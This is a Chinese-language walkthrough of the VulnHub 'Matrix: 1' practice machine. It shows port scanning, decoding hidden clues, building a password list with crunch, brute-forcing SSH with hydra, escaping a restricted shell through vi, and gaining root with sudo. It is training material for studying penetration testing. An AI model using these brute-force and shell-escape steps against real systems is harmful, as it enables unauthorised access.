Matrix: 1 | 靶机 | VulnHub Walkthrough

Download

Back to the Top

Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for “protecting yourself and your network. If you understand the risks, please download!

• Machine_Matrix.zip (Size: 552 MB)

• Download: https://mega.nz/#!CiwBjRZB!EtKOQvDQjytMq3LkkMgrHDC9EYxEz8mqpOg5M2N1OOk

• Download (Mirror): https://download.vulnhub.com/matrix/Machine_Matrix.zip

信息收集

主机发现

kali ip:192.168.87.128

靶机ip :192.168.87.142

端口扫描

nmap -sV -p- 192.168.87.142		

发现了22、80、31337端口开放

目录爆破

Web渗透

访问80端口

访问31337端口

发现了一串basey64编码

ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=
解码得到
echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

看下Cypher.matrix

brainfuck编码

对其进行解码

You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.

您可以以访客身份进入matrix，密码为k1ll0rXX
注意:事实上，我忘记了最后两个字符，所以我用XX代替。试试你的运气，找到正确的密码串。

用crunch生成对应密码字典即可。

cat /usr/share/crunch/charset.lst

选择要使用的crunch字典字符集范围

crunch 8 8 -f /usr/share/crunch/charset.lst lalpha-numeric -t k1ll0r@@ > pass.dic

-f 指定字符集，-t 插入小写字符

使用hydra爆破

hydra -l guest -P pass.dic ssh://192.168.87.142

成功连接

Rbash逃逸

rbash与一般shell的区别在于会限制一些行为，让一些命令无法执行。
需要进行rbash逃逸

vi
:!/bin/bash

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

现在可以执行命令了

提权

sudo su root

直接用刚刚爆破出来的密码提权了

成功查看到flag